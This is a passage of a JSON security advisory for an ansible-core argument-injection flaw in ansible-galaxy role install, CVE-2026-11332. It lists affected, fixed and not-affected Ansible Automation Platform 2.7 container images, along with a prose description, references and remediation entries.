"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2485379"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ansible-core. The ansible-galaxy role install command processes dependency specifications from a role\u0027s meta/requirements.yml file. Due to improper neutralization of argument delimiters, a malicious role author can inject arbitrary git configuration flags through the src field. This allows arbitrary code execution on the machine of a user who installs the role via ansible-galaxy role install.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ansible-core: argument injection in ansible-galaxy role install leads to arbitrary code execution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Conditions for Exploitation: Successful exploitation requires user interaction, specifically tricking a victim into installing a maliciously crafted Ansible role (or a role with a malicious dependency) using the ansible-galaxy role install command.\n\nBroad Impact: While user interaction is required, the potential impact is highly severe. Successfully injecting the malicious arguments allows a remote attacker to achieve arbitrary code execution on the machine running the Ansible command, leading to a full compromise of the user\u0027s environment and system integrity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-11332"
},
{
"category": "external",
"summary": "RHBZ#2485379",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2485379"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-11332",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-11332"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-11332",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11332"
},
{
"category": "external",
"summary": "https://github.com/ansible/ansible",
"url": "https://github.com/ansible/ansible"
}
],
"release_date": "2026-06-05T07:12:55.739000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
